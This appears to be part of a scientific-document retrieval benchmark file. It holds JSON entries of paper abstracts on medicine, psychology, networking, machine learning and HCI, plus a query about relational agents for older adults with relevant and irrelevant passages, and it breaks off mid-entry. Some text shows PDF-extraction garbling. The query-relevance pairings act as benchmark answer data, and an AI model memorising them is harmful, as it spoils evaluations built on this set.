"text": "Sepsis remains a major cause of mortality and morbidity in neonates, and, as a consequence, antibiotics are the most frequently prescribed drugs in this vulnerable patient population. Growth and dynamic maturation processes during the first weeks of life result in large inter- and intrasubject variability in the pharmacokinetics (PK) and pharmacodynamics (PD) of antibiotics. In this review we (1) summarize the available population PK data and models for primarily renally eliminated antibiotics, (2) discuss quantitative approaches to account for effects of growth and maturation processes on drug exposure and response, (3) evaluate current dose recommendations, and (4) identify opportunities to further optimize and personalize dosing strategies of these antibiotics in preterm and term neonates. Although population PK models have been developed for several of these drugs, exposure-response relationships of primarily renally eliminated antibiotics in these fragile infants are not well understood, monitoring strategies remain inconsistent, and consensus on optimal, personalized dosing of these drugs in these patients is absent. Tailored PK/PD studies and models are useful to better understand relationships between drug exposures and microbiological or clinical outcomes. Pharmacometric modeling and simulation approaches facilitate quantitative evaluation and optimization of treatment strategies. National and international collaborations and platforms are essential to standardize and harmonize not only studies and models but also monitoring and dosing strategies. Simple bedside decision tools assist clinical pharmacologists and neonatologists in their efforts to fine-tune and personalize the use of primarily renally eliminated antibiotics in term and preterm neonates.",
"title": ""
},
{
"docid": "bb1d208ad8f31e59ecba7eea35dcff8a",
"text": "Over the past two decades, the molecular machinery that underlies autophagic responses has been characterized with ever increasing precision in multiple model organisms. Moreover, it has become clear that autophagy and autophagy-related processes have profound implications for human pathophysiology. However, considerable confusion persists about the use of appropriate terms to indicate specific types of autophagy and some components of the autophagy machinery, which may have detrimental effects on the expansion of the field. Driven by the overt recognition of such a potential obstacle, a panel of leading experts in the field attempts here to define several autophagy-related terms based on specific biochemical features. The ultimate objective of this collaborative exchange is to formulate recommendations that facilitate the dissemination of knowledge within and outside the field of autophagy research.",
"title": ""
},
{
"docid": "afbaa73c13a54ce746751d693595247e",
"text": "Glossary Affective Processes: Processes regulating emotional states and elicitation of emotional reactions. Cognitive Processes: Thinking processes involved in the acquisition, organization and use of information. Motivation: Activation to action. Level of motivation is reflected in choice of courses of action, and in the intensity and persistence of effort. Perceived Self-Efficacy: People's beliefs about their capabilities to produce effects. Self-Regulation: Exercise of influence over one's own motivation, thought processes, emotional states and patterns of behavior. Perceived self-efficacy is defined as people's beliefs about their capabilities to produce designated levels of performance that exercise influence over events that affect their lives. Self-efficacy beliefs determine how people feel, think, motivate themselves and behave. Such beliefs produce these diverse effects through four major processes. They include cognitive, motivational, affective and selection processes. A strong sense of efficacy enhances human accomplishment and personal well-being in many ways. People with high assurance in their capabilities approach difficult tasks as challenges to be mastered rather than as threats to be avoided. Such an efficacious outlook fosters intrinsic interest and deep engrossment in activities. They set themselves challenging goals and maintain strong commitment to them. They heighten and sustain their efforts in the face of failure. They quickly recover their sense of efficacy after failures or setbacks. They attribute failure to insufficient effort or deficient knowledge and skills which are acquirable. They approach threatening situations with assurance that they can exercise control over them. Such an efficacious outlook produces personal accomplishments, reduces stress and lowers vulnerability to depression. 2 In contrast, people who doubt their capabilities shy away from difficult tasks which they view as personal threats. They have low aspirations and weak commitment to the goals they choose to pursue. When faced with difficult tasks, they dwell on their personal deficiencies, on the obstacles they will encounter, and all kinds of adverse outcomes rather than concentrate on how to perform successfully. They slacken their efforts and give up quickly in the face of difficulties. They are slow to recover their sense of efficacy following failure or setbacks. Because they view insufficient performance as deficient aptitude it does not require much failure for them to lose faith in their capabilities. They fall easy victim to stress and depression. Lisa's notes: So here is the crux of the matter: How do we raise children with serious, chronic illnesses to have strong self-efficacy? It can literally be a matter of …",
"title": ""
},
{
"docid": "b3b59ec24d56b7f68a72374a2a53abf3",
"text": "PURPOSE: Optical tracking is a commonly used tool in computer assisted surgery and surgical training; however, many current generation commercially available tracking systems are prohibitively large and expensive for certain applications. We developed an open source optical tracking system using the Intel RealSense SR300 webcam with integrated depth sensor. In this paper, we assess the accuracy of this tracking system. METHODS: The PLUS toolkit was extended to incorporate the ArUco marker detection and tracking library. The depth data obtained from the infrared sensor of the Intel RealSense SR300 was used to improve accuracy. We assessed the accuracy of the system by comparing this tracker to a high accuracy commercial optical tracker. RESULTS: The ArUco based optical tracking algorithm had median errors of 20.0mm and 4.1 degrees in a 200x200x200mm tracking volume. Our algorithm processing the depth data had a positional error of 17.3mm, and an orientation error of 7.1 degrees in the same tracking volume. In the direction perpendicular to the sensor, the optical only tracking had positional errors between 11% and 15%, compared to errors in depth of 1% or less. In tracking one marker relative to another, a fused transform from optical and depth data produced the best result of 1.39% error. CONCLUSION: The webcam based system does not yet have satisfactory accuracy for use in computer assisted surgery or surgical training.",
"title": ""
},
{
"docid": "5f92491cb7da547ba3ea6945832342ac",
"text": "SwitchKV is a new key-value store system design that combines high-performance cache nodes with resourceconstrained backend nodes to provide load balancing in the face of unpredictable workload skew. The cache nodes absorb the hottest queries so that no individual backend node is over-burdened. Compared with previous designs, SwitchKV exploits SDN techniques and deeply optimized switch hardware to enable efficient contentbased routing. Programmable network switches keep track of cached keys and route requests to the appropriate nodes at line speed, based on keys encoded in packet headers. A new hybrid caching strategy keeps cache and switch forwarding rules updated with low overhead and ensures that system load is always well-balanced under rapidly changing workloads. Our evaluation results demonstrate that SwitchKV can achieve up to 5× throughput and 3× latency improvements over traditional system designs.",
"title": ""
},
{
"docid": "f017d6dff147f00fcbb2356e4fd9e06f",
"text": "In this paper, an index based on customer perspective is proposed for evaluating transit service quality. The index, named Heterogeneous Customer Satisfaction Index, is inspired by the traditional Customer Satisfaction Index, but takes into account the heterogeneity among the user judgments about the different service aspects. The index allows service quality to be monitored, the causes generating customer satisfaction/dissatisfaction to be identified, and the strategies for improving the service quality to be defined. The proposed methodologies show some advantages compared to the others adopted for measuring service quality, because it can be easily applied by the transit operators. Introduction Transit service quality is an aspect markedly influencing travel user choices. Customers who have a good experience with transit will probably use transit services again, while customers who experience problems with transit may not use transit services the next time. For this reason, improving service quality is important for customizing habitual travellers and for attracting new users. Moreover, the need for supplying services characterized by high levels of quality guarantees competition among transit agencies, and, consequently, the user takes advantage of Journal of Public Transportation, Vol. 12, No. 3, 2009 22 better services. To achieve these goals, transit agencies must measure their performance. Customer satisfaction represents a measure of company performance according to customer needs (Hill et al. 2003); therefore, the measure of customer satisfaction provides a service quality measure. Customers express their points of view about the services by providing judgments on some service aspects by means of ad hoc experimental sample surveys, known in the literature as “customer satisfaction surveys.” The aspects generally describing transit services can be distinguished into the characteristics that more properly describe the service (e.g., service frequency), and less easily measurable characteristics that depend more on customer tastes (e.g., comfort). In the literature, there are many studies about transit service quality. Examples of the most recent research are reported in TRB (2003a, 2003b), Eboli and Mazzulla (2007), Tyrinopoulos and Antoniou (2008), Iseki and Taylor (2008), and Joewono and Kubota (2007). In these studies, different attributes determining transit service quality are discussed; the main service aspects characterizing a transit service include service scheduling and reliability, service coverage, information, comfort, cleanliness, and safety and security. Service scheduling can be defined by service frequency (number of runs per hour or per day) and service time (time during which the service is available). Service reliability concerns the regularity of runs that are on schedule and on time; an unreliable service does not permit user travel times to be optimized. Service coverage concerns service availability in the space and is expressed through line path characteristics, number of stops, distance between stops, and accessibility of stops. Information consists of indications about departure and arrival scheduled times of the runs, boarding/alighting stop location, ticket costs, and so on. Comfort refers to passenger personal comfort while transit is used, including climate control, seat comfort, ride comfort including the severity of acceleration and braking, odors, and vehicle noise. 
Cleanliness refers to the internal and external cleanliness of vehicles and cleanliness of terminals and stops. Safety concerns the possibility that users can be involved in an accident, and security concerns personal security against crimes. Other service aspects characterizing transit services concern fares, personnel appearance and helpfulness, environmental protection, and customer services such ease of purchasing tickets and administration of complaints. The objective of this research is to provide a tool for measuring the overall transit service quality, taking into account user judgments about different service aspects. A New Customer Satisfaction Index for Evaluating Transit Service Quality 23 A synthetic index of overall satisfaction is proposed, which easily can be used by transit agencies for monitoring service performance. In the next section, a critical review of indexes for measuring service quality from a user perspective is made; observations and remarks emerge from the comparison among the indexes analysed. Because of the disadvantages of the indexes reported in the literature, a new index is proposed. The proposed methodology is applied by using experimental data collected by a customer satisfaction survey of passengers of a suburban transit service. The obtained results are discussed at the end of the paper. Customer Satisfaction Indexes The concept of customer satisfaction as a measure of perceived service quality was introduced in market research. In this field, many customer satisfaction techniques have been developed. The best known and most widely applied technique is the ServQual method, proposed by Parasuraman et al. (1985). The ServQual method introduced the concept of customer satisfaction as a function of customer expectations (what customers expect from the service) and perceptions (what customers receive). The method was developed to assess customer perceptions of service quality in retail and service organizations. In the method, 5 service quality dimensions and 22 items for measuring service quality are defined. Service quality dimensions are tangibles, reliability, responsiveness, assurance, and empathy. The method is in the form of a questionnaire that uses a Likert scale on seven levels of agreement/disagreement (from “strongly disagree” to “strongly agree”). ServQual provides an index calculated through the difference between perception and expectation rates expressed for the items, weighted as a function of the five service quality dimensions embedding the items. Some variations of this method were introduced in subsequent years. For example, Cronin and Taylor (1994) introduced the ServPerf method, and Teas (1993) proposed a model named Normed Quality (NQ). Although ServQual represents the most widely adopted method for measuring service quality, the adopted scale of measurement for capturing customer judgments has some disadvantages in obtaining an overall numerical measure of service quality; in fact, to calculate an index, the analyst is forced to assign a numerical code to each level of judgment. In this way, equidistant numbers are assigned to each qualitative point of the scale; this operation presumes that the distances between two consecutive levels of judgment expressed by the customers have the same size. Journal of Public Transportation, Vol. 12, No. 3, 2009 24 A number of both national and international indexes also based on customer perceptions and expectations have been introduced in the last decade. 
For the most part, these satisfaction indexes are embedded within a system of cause-and-effect relationships or satisfaction models. The models also contain latent or unobservable variables and provide a reliable satisfaction index (Johnson et al. 2001). The Swedish Customer Satisfaction Barometer (SCSB) was established in 1989 and is the first national customer satisfaction index for domestically purchased and consumed products and services (Fornell 1992). The American Customer Satisfaction Index (ACSI) was introduced in the fall of 1994 (Fornell et al. 1996). The Norwegian Customer Satisfaction Barometer (NCSB) was introduced in 1996 (Andreassen and Lervik 1999; Andreassen and Lindestad 1998). The most recent development among these indexes is the European Customer Satisfaction Index (ECSI) (Eklof 2000). The original SCSB model is based on customer perceptions and expectations regarding products or services. All the other models are based on the same concepts, but they differ from the original regarding the variables considered and the cause-and-effect relationships introduced. The models from which these indexes are derived have a very complex structure. In addition, model coefficient estimation needs of large quantities of experimental data and the calibration procedure are not easily workable. For this reason, this method is not very usable by transit agencies, particularly for monitoring service quality. More recently, an index based on discrete choice models and random utility theory has been introduced. The index, named Service Quality Index (SQI), is calculated by the utility function of a choice alternative representing a service (Hensher and Prioni 2002). The user makes a choice between the service habitually used and hypothetical services. Hypothetical services are defined through Stated Preferences (SP) techniques by varying the level of quality of aspects characterizing the service. Habitual service is described by the user by assigning a value to each service aspect. The design of this type of SP experiments is generally very complex; an example of an SP experimental design was introduced by Eboli and Mazzulla (2008a). SQI was firstly calculated by a Multinomial Logit model to evaluate the level of quality of transit services. Hierarchical Logit models were introduced for calculating SQI by Hensher et al. (2003) and Marcucci and Gatta (2007). Mixed Logit models were introduced by Hensher (2001) and Eboli and Mazzulla (2008b). SQI includes, indirectly, the concept of satisfaction as a function of customer expectations and perceptions. The calculation of the indexes following approaches different from SQI presumes the use of customer judgments in terms of rating. To the contrary, SQI is based on choice data; nevertheless, by choosing a service, the user indirectly A New Customer Satisfaction Index for Evaluating Transit Service Quality 25 expresses a judgment of importance on the service aspects defining the services. In addition, the user expres",
"title": ""
},
{
"docid": "e711f9f57e1c3c22c762bf17cb6afd2b",
"text": "Qualitative research methodology has become an established part of the medical education research field. A very popular data-collection technique used in qualitative research is the \"focus group\". Focus groups in this Guide are defined as \"… group discussions organized to explore a specific set of issues … The group is focused in the sense that it involves some kind of collective activity … crucially, focus groups are distinguished from the broader category of group interview by the explicit use of the group interaction as research data\" (Kitzinger 1994, p. 103). This Guide has been designed to provide people who are interested in using focus groups with the information and tools to organize, conduct, analyze and publish sound focus group research within a broader understanding of the background and theoretical grounding of the focus group method. The Guide is organized as follows: Firstly, to describe the evolution of the focus group in the social sciences research domain. Secondly, to describe the paradigmatic fit of focus groups within qualitative research approaches in the field of medical education. After defining, the nature of focus groups and when, and when not, to use them, the Guide takes on a more practical approach, taking the reader through the various steps that need to be taken in conducting effective focus group research. Finally, the Guide finishes with practical hints towards writing up a focus group study for publication.",
"title": ""
},
{
"docid": "1c39ffe697fe2f64c9c6b71cc8ba3652",
"text": "Mouse dynamics is the process of identifying individual users based on their mouse operating characteristics. Although previous work has reported some promising results, mouse dynamics is still a newly emerging technique and has not reached an acceptable level of performance. One of the major reasons is intrinsic behavioral variability. This study presents a novel approach by using pattern-growth-based mining method to extract frequent-behavior segments in obtaining stable mouse characteristics, employing one-class classification algorithms to perform the task of continuous user authentication. Experimental results show that mouse characteristics extracted from frequent-behavior segments are much more stable than those from holistic behavior, and the approach achieves a practically useful level of performance with FAR of 0.37% and FRR of 1.12%. These findings suggest that mouse dynamics suffice to be a significant enhancement for a traditional authentication system. Our dataset is publicly available to facilitate future research.",
"title": ""
},
{
"docid": "788b88aef3d606c4496633a35a277433",
"text": "Modern hardware and software development has led to an evolution of user interfaces from command-line to natural user interfaces for virtual immersive environments. Gestures imitating real-world interaction tasks increasingly replace classical two-dimensional interfaces based on Windows/Icons/Menus/Pointers (WIMP) or touch metaphors. Thus, the purpose of this paper is to survey the state-of-the-art Human-Computer Interaction (HCI) techniques with a focus on the special field of three-dimensional interaction. This includes an overview of currently available interaction devices, their applications of usage and underlying methods for gesture design and recognition. Focus is on interfaces based on the Leap Motion Controller (LMC) and corresponding methods of gesture design and recognition. Further, a review of evaluation methods for the proposed natural user interfaces is given.",
"title": ""
},
{
"docid": "686a8e474cece7380d3401a023e678e9",
"text": "This paper introduces SDWS (Semantic Description of Web Services), a Web tool which generates semantic descriptions from collections of Web services. The fundamental approach of SDWS consists of the integration of a set of ontological models for the representation of different Web service description languages and models. The main contributions of this proposal are (i) a general ontological model for the representation of Web services, (ii) a set of language-specific ontological models for the representation of different Web service descriptions implementations, and (iii) a set of software modules that automatically parse Web service descriptions and produce their respective ontological representation. The design of the generic service model incorporates the common elements that all service descriptions share: a service name, a set of operations, and input and output parameters; together with other important elements that semantic models define: preconditions and effects. Experimental results show that the automatic generation of semantic descriptions from public Web services is feasible and represents an important step towards the integration of a general semantic service registry.",
"title": ""
},
{
"docid": "52de47c3253e1235a0609e207d252445",
"text": "Label propagation is a popular graph-based semisupervised learning framework. So as to obtain the optimal labeling scores, the label propagation algorithm requires an inverse matrix which incurs the high computational cost of O(n+cn), where n and c are the numbers of data points and labels, respectively. This paper proposes an efficient label propagation algorithm that guarantees exactly the same labeling results as those yielded by optimal labeling scores. The key to our approach is to iteratively compute lower and upper bounds of labeling scores to prune unnecessary score computations. This idea significantly reduces the computational cost to O(cnt) where t is the average number of iterations for each label and t ≪ n in practice. Experiments demonstrate the significant superiority of our algorithm over existing label propagation methods.",
"title": ""
},
{
"docid": "56c61887f762d5e12f7bb2e8f1b2160b",
"text": "BACKGROUND\nAdequate fruit and vegetable intake has been found to promote health and reduce the risk of several cancers and chronic diseases. Understanding the psychological determinants of fruit and vegetable intake is needed to design effective intervention programs.\n\n\nMETHODS\nPapers published in English from 1994 to 2006 that described the relationship between psychosocial predictors and fruit and vegetable intake in adults were reviewed. Studies and their constructs were independently rated based on the direction of significant effects, quality of execution, design suitability, and frequency. Methodology from the Guide to Community Preventive Services was used to systematically review and synthesize findings.\n\n\nRESULTS\nTwenty-five psychosocial constructs spanning 35 studies were reviewed (14 prospective and 21 cross-sectional/descriptive studies). Strong evidence was found for self-efficacy, social support, and knowledge as predictors of adult fruit and vegetable intake. Weaker evidence was found for variables including barriers, intentions, attitudes/beliefs, stages of change, and autonomous motivation.\n\n\nCONCLUSIONS\nThe findings underscore the need to design future behavioral interventions that use strong experimental designs with efficacious constructs and to conduct formal mediation analyses to determine the strength of these potential predictors of fruit and vegetable intake.",
"title": ""
},
{
"docid": "8184d4b1ee1b9877990e14941f517efa",
"text": "Neural architecture search (NAS) has a great impact by automatically designing effective neural network architectures. However, the prohibitive computational demand of conventional NAS algorithms (e.g. 10 GPU hours) makes it difficult to directly search the architectures on large-scale tasks (e.g. ImageNet). Differentiable NAS can reduce the cost of GPU hours via a continuous representation of network architecture but suffers from the high GPU memory consumption issue (grow linearly w.r.t. candidate set size). As a result, they need to utilize proxy tasks, such as training on a smaller dataset, or learning with only a few blocks, or training just for a few epochs. These architectures optimized on proxy tasks are not guaranteed to be optimal on target task. In this paper, we present ProxylessNAS that can directly learn the architectures for large-scale target tasks and target hardware platforms. We address the high memory consumption issue of differentiable NAS and reduce the computational cost (GPU hours and GPU memory) to the same level of regular training while still allowing a large candidate set. Experiments on CIFAR-10 and ImageNet demonstrate the effectiveness of directness and specialization. On CIFAR-10, our model achieves 2.08% test error with only 5.7M parameters, better than the previous state-of-the-art architecture AmoebaNet-B, while using 6× fewer parameters. On ImageNet, our model achieves 3.1% better top-1 accuracy than MobileNetV2, while being 1.2× faster with measured GPU latency. We also apply ProxylessNAS to specialize neural architectures for hardware with direct hardware metrics (e.g. latency) and provide insights for efficient CNN architecture design.1 1 INTRODUCTION Neural architecture search (NAS) has demonstrated much success in automating neural network architecture design for various deep learning tasks, such as image recognition (Zoph et al., 2018; Cai et al., 2018a; Liu et al., 2018a; Zhong et al., 2018) and language modeling (Zoph & Le, 2017). Despite the remarkable results, conventional NAS algorithms are prohibitively computation-intensive, requiring to train thousands of models on the target task in a single experiment. Therefore, directly applying NAS to a large-scale task (e.g. ImageNet) is computationally expensive or impossible, which makes it difficult for making practical industry impact. As a trade-off, Zoph et al. (2018) propose to search for building blocks on proxy tasks, such as training for fewer epochs, starting with a smaller dataset (e.g. CIFAR-10), or learning with fewer blocks. Then top-performing blocks are stacked and transferred to the large-scale target task. This paradigm has been widely adopted in subsequent NAS algorithms (Liu et al., 2018a;b; Real et al., 2018; Cai et al., 2018b; Liu et al., 2018c; Tan et al., 2018; Luo et al., 2018). However, these blocks optimized on proxy tasks are not guaranteed to be optimal on target task, especially when taking hardware metrics such as latency into consideration. More importantly, to enable transferability, such methods need to search for only a few architectural motifs and then repeatedly stack the same pattern, which restricts the block diversity and thereby harms performance. In this work, we propose a simple and effective solution to the aforementioned limitations, called ProxylessNAS, which directly learns the architectures on the target task and hardware instead of with Pretrained models and evaluation code are released at https://github.com/MIT-HAN-LAB/ProxylessNAS. 
1 ar X iv :1 81 2. 00 33 2v 1 [ cs .L G ] 2 D ec 2 01 8 Proxy Task Learner Target Task & Hardware Transfer (1) Previous proxy-based approach (2) Our proxy-less approach Architecture Updates Architecture Updates Target Task & Hardware Learner Normal Train NAS
Need Meta Controller Need Proxy DARTS & One-shot No Meta Controller Need Proxy Proxyless (Ours)
No Meta Controller No Proxy GPU Hours GPU Memory Figure 1: ProxylessNAS directly optimizes neural network architectures on target task and hardware. Benefit from the directness and specialization, ProxylessNAS can achieve remarkably better results than previous proxy-based approaches. proxy (Figure 1). We also remove the restriction of repeating blocks in previous NAS works (Zoph et al., 2018; Liu et al., 2018c) and allow all of the blocks to be learned and specified. To achieve this, we reduce the computational cost (GPU hours and GPU memory) of architecture search to the same level of regular training in the following ways. GPU hour-wise, inspired by recent works (Liu et al., 2018c; Bender et al., 2018), we formulate NAS as a path-level pruning process. Specifically, we directly train an over-parameterized network that contains all candidate paths (Figure 2). During training, we explicitly introduce architecture parameters to learn which paths are redundant, while these redundant paths are pruned at the end of training to get a compact optimized architecture. In this way, we only need to train a single network without any meta-controller (or hypernetwork) during architecture search. However, naively including all the candidate paths leads to GPU memory explosion (Liu et al., 2018c; Bender et al., 2018), as the memory consumption grows linearly w.r.t. the number of choices. Thus, GPU memory-wise, we binarize the architecture parameters (1 or 0) and force only one path to be active at run-time, which reduces the required m mory to the same lev l of tr ining a compact model. We propose a gradient-based approach to train these binarized parameters based on BinaryConnect (Courbariaux et al., 2015). Furthermore, to handle non-differentiable hardware objectives (using latency as an example) for learning specialized network architectures on target hardware, we model network latency as a continuous function and optimize it as regularization loss. Additionally, we also present a REINFORCE-based (Williams, 1992) algorithm as an alternative strategy to handle hardware metrics. In our experiments on CIFAR-10 and ImageNet, benefit from the directness and specialization, our method can achieve strong empirical results. On CIFAR-10, our model reaches 2.08% test error with only 5.7M parameters. On ImageNet, our model achieves 75.1% top-1 accuracy which is 3.1% higher than MobileNetV2 (Sandler et al., 2018) while being 1.2× faster. Our contributions can be summarized as follows: • ProxylessNAS is the first NAS algorithm that directly learns architectures on the largescale dataset (e.g. ImageNet) without any proxy while still allowing a large candidate set and removing the restriction of repeating blocks. It effectively enlarged the search space and achieved better performance. • We provide a new path-level pruning perspective for NAS, showing a close connection between NAS and model compression (Han et al., 2016). We save the memory consumption by one order of magnitude by using path-level binarization. • We propose a novel gradient-based approach (latency regularization loss) for handling hardware objectives (e.g. latency). Given different hardware platforms: CPU/GPU/FPGA/TPU/NPU, ProxylessNAS enables hardware-aware neural network specialization that’s exactly optimized for the target hardware. To our best knowledge, it is the first work to study specialized neural network architectures for different hardware architectures. 
• Extensive experiments showed the advantage of the directness property and the specialization property of ProxylessNAS. It achieved state-of-the-art accuracy performances on CIFAR-10 and ImageNet under latency constraints on different hardware platforms (GPU, CPU and mobile phone). We also analyze the insights of efficient CNN models specialized for different hardware platforms and raise the awareness that specialized neural network architecture is needed on different hardware architectures for efficient inference. 2 RELATED WORK The use of machine learning techniques, such as reinforcement learning or neuro-evolution, to replace human experts in designing neural network architectures, usually referred to as neural architecture search, has drawn an increasing interest (Zoph & Le, 2017; Liu et al., 2018a;b;c; Cai et al., 2018a;b; Pham et al., 2018; Brock et al., 2018; Bender et al., 2018; Elsken et al., 2017; 2018b). In NAS, architecture search is typically considered as a meta-learning process, and a meta-controller (e.g. a recurrent neural network (RNN)), is introduced to explore a given architecture space with training a network in the inner loop to get an evaluation for guiding exploration. Consequently, such methods are computationally expensive to run, especially on large-scale tasks, e.g. ImageNet. Some recent works (Brock et al., 2018; Pham et al., 2018) try to improve the efficiency of this meta-learning process by reducing the cost of getting an evaluation. In Brock et al. (2018), a hypernetwork is utilized to generate weights for each sampled network and hence can evaluate the architecture without training it. Similarly, Pham et al. (2018) propose to share weights among all sampled networks under the standard NAS framework (Zoph & Le, 2017). These methods speed up architecture search by orders of magnitude, however, they require a hypernetwork or an RNN controller and mainly focus on small-scale tasks (e.g. CIFAR) rather than large-scale tasks (e.g. ImageNet). Our work is most closely related to One-Shot (Bender et al., 2018) and DARTS (Liu et al., 2018c), both of which get rid of the meta-controller (or hypernetwork) by modeling NAS as a single training process of an over-parameterized network that comprises all candidate paths. Specifically, One-Shot trains the over-parameterized network with DropPath (Zoph et al., 2018) that drops out each path with some fixed probability. Then they use the pre-trained over-parameterized network to evaluate architectures, which are sampled by randomly zeroing out paths. DARTS additionally introduces a real-valued architecture parameter fo",
"title": ""
},
{
"docid": "dd840a0e33da0fc4e74fb2441d22c769",
"text": "The evolution of IPv6 technology had become a worldwide trend and showed a significant increase, particularly with the near-coming era named “Internet of Things” or so-called IOT. Concomitant with the transition process from version 4 to version 6, there are open security hole that considered to be vulnerable, mainly against cyber-attacks that poses a threat to companies implements IPv6 network topology. The purpose of this research is to create a model of acceptance of the factors that influenced the behavior of individuals in providing security within IPv6 network topology and analysis of factors that affects the acceptance of individuals in anticipating security with regards to IPv6 network topology. This study was conducted using both, quantitative method focuses on statistical processing on the result of questionnaire filled by respondents using Structural Equation Modeling (SEM), as well as qualitative method to conduct Focus Group Discussion (FGD) and interviews with experts from various background such as: practitioners, academician and government representatives. The results showed ease of use provides insignificant correlation to the referred behavior of avoiding threat on IPv6 environment.",
"title": ""
},
{
"docid": "9ca27ddd53d13db68a5f2c4477c13967",
"text": "Humans have a remarkable ability to use physical commonsense and predict the effect of collisions. But do they understand the underlying factors? Can they predict if the underlying factors have changed? Interestingly, in most cases humans can predict the effects of similar collisions with different conditions such as changes in mass, friction, etc. It is postulated this is primarily because we learn to model physics with meaningful latent variables. This does not imply we can estimate the precise values of these meaningful variables (estimate exact values of mass or friction). Inspired by this observation, we propose an interpretable intuitive physics model where specific dimensions in the bottleneck layers correspond to different physical properties. In order to demonstrate that our system models these underlying physical properties, we train our model on collisions of different shapes (cube, cone, cylinder, spheres etc.) and test on collisions of unseen combinations of shapes. Furthermore, we demonstrate our model generalizes well even when similar scenes are simulated with different underlying properties.",
"title": ""
},
{
"docid": "34401a7e137cffe44f67e6267f29aa57",
"text": "Future Point-of-Care (PoC) molecular-level diagnosis requires advanced biosensing systems that can achieve high sensitivity and portability at low power consumption levels, all within a low price-tag for a variety of applications such as in-field medical diagnostics, epidemic disease control, biohazard detection, and forensic analysis. Magnetically labeled biosensors are proposed as a promising candidate to potentially eliminate or augment the optical instruments used by conventional fluorescence-based sensors. However, magnetic biosensors developed thus far require externally generated magnetic biasing fields [1–4] and/or exotic post-fabrication processes [1,2]. This limits the ultimate form-factor of the system, total power consumption, and cost. To address these impediments, we present a low-power scalable frequency-shift magnetic particle biosensor array in bulk CMOS, which provides single-bead detection sensitivity without any (electrical or permanent) external magnets.",
"title": ""
}
] | scidocsrr |
ee3e164cc8377cc0f3fdca28d68bb9a3 | 'It's just like you talk to a friend' relational agents for older adults | [
{
"docid": "60c06e137f13c3fd1673feeb97d9e214",
"text": "BACKGROUND\nAnimal-assisted therapy (AAT) is claimed to have a variety of benefits, but almost all published results are anecdotal. We characterized the resident population in long-term care facilities desiring AAT and determined whether AAT can objectively improve loneliness.\n\n\nMETHODS\nOf 62 residents, 45 met inclusion criteria for the study. These 45 residents were administered the Demographic and Pet History Questionnaire (DPHQ) and Version 3 of the UCLA Loneliness Scale (UCLA-LS). They were then randomized into three groups (no AAT; AAT once/week; AAT three times/week; n = 15/group) and retested with the UCLA-LS near the end of the 6-week study.\n\n\nRESULTS\nUse of the DPHQ showed residents volunteering for the study had a strong life-history of emotional intimacy with pets and wished that they currently had a pet. AAT was shown by analysis of covariance followed by pairwise comparison to have significantly reduced loneliness scores in comparison with the no AAT group.\n\n\nCONCLUSIONS\nThe desire for AAT strongly correlates with previous pet ownership. AAT reduces loneliness in residents of long-term care facilities.",
"title": ""
},
{
"docid": "8efee8d7c3bf229fa5936209c43a7cff",
"text": "This research investigates the meaning of “human-computer relationship” and presents techniques for constructing, maintaining, and evaluating such relationships, based on research in social psychology, sociolinguistics, communication and other social sciences. Contexts in which relationships are particularly important are described, together with specific benefits (like trust) and task outcomes (like improved learning) known to be associated with relationship quality. We especially consider the problem of designing for long-term interaction, and define relational agents as computational artifacts designed to establish and maintain long-term social-emotional relationships with their users. We construct the first such agent, and evaluate it in a controlled experiment with 101 users who were asked to interact daily with an exercise adoption system for a month. Compared to an equivalent task-oriented agent without any deliberate social-emotional or relationship-building skills, the relational agent was respected more, liked more, and trusted more, even after four weeks of interaction. Additionally, users expressed a significantly greater desire to continue working with the relational agent after the termination of the study. We conclude by discussing future directions for this research together with ethical and other ramifications of this work for HCI designers.",
"title": ""
}
] | [
{
"docid": "45eb2d7b74f485e9eeef584555e38316",
"text": "With the increasing demand of massive multimodal data storage and organization, cross-modal retrieval based on hashing technique has drawn much attention nowadays. It takes the binary codes of one modality as the query to retrieve the relevant hashing codes of another modality. However, the existing binary constraint makes it difficult to find the optimal cross-modal hashing function. Most approaches choose to relax the constraint and perform thresholding strategy on the real-value representation instead of directly solving the original objective. In this paper, we first provide a concrete analysis about the effectiveness of multimodal networks in preserving the inter- and intra-modal consistency. Based on the analysis, we provide a so-called Deep Binary Reconstruction (DBRC) network that can directly learn the binary hashing codes in an unsupervised fashion. The superiority comes from a proposed simple but efficient activation function, named as Adaptive Tanh (ATanh). The ATanh function can adaptively learn the binary codes and be trained via back-propagation. Extensive experiments on three benchmark datasets demonstrate that DBRC outperforms several state-of-the-art methods in both image2text and text2image retrieval task.",
"title": ""
},
{
"docid": "0551e9faef769350102a404fa0b61dc1",
"text": "Lignocellulosic biomass is a complex biopolymer that is primary composed of cellulose, hemicellulose, and lignin. The presence of cellulose in biomass is able to depolymerise into nanodimension biomaterial, with exceptional mechanical properties for biocomposites, pharmaceutical carriers, and electronic substrate's application. However, the entangled biomass ultrastructure consists of inherent properties, such as strong lignin layers, low cellulose accessibility to chemicals, and high cellulose crystallinity, which inhibit the digestibility of the biomass for cellulose extraction. This situation offers both challenges and promises for the biomass biorefinery development to utilize the cellulose from lignocellulosic biomass. Thus, multistep biorefinery processes are necessary to ensure the deconstruction of noncellulosic content in lignocellulosic biomass, while maintaining cellulose product for further hydrolysis into nanocellulose material. In this review, we discuss the molecular structure basis for biomass recalcitrance, reengineering process of lignocellulosic biomass into nanocellulose via chemical, and novel catalytic approaches. Furthermore, review on catalyst design to overcome key barriers regarding the natural resistance of biomass will be presented herein.",
"title": ""
},
{
"docid": "40746bfccf801222d99151dc4b4cb7e8",
"text": "Fingerprints are the oldest and most widely used form of biometric identification. Everyone is known to have unique, immutable fingerprints. As most Automatic Fingerprint Recognition Systems are based on local ridge features known as minutiae, marking minutiae accurately and rejecting false ones is very important. However, fingerprint images get degraded and corrupted due to variations in skin and impression conditions. Thus, image enhancement techniques are employed prior to minutiae extraction. A critical step in automatic fingerprint matching is to reliably extract minutiae from the input fingerprint images. This paper presents a review of a large number of techniques present in the literature for extracting fingerprint minutiae. The techniques are broadly classified as those working on binarized images and those that work on gray scale images directly.",
"title": ""
},
{
"docid": "e72ce7617cc941543a07059bc3a1a4a2",
"text": "Ensemble learning strategies, especially boosting and bagging decision trees, have demonstrated impressive capacities to improve the prediction accuracy of base learning algorithms. Further gains have been demonstrated by strategies that combine simple ensemble formation approaches. We investigate the hypothesis that the improvement in accuracy of multistrategy approaches to ensemble learning is due to an increase in the diversity of ensemble members that are formed. In addition, guided by this hypothesis, we develop three new multistrategy ensemble learning techniques. Experimental results in a wide variety of natural domains suggest that these multistrategy ensemble learning techniques are, on average, more accurate than their component ensemble learning techniques.",
"title": ""
},
{
"docid": "973da8a50b1250688fceb94611a4f0f7",
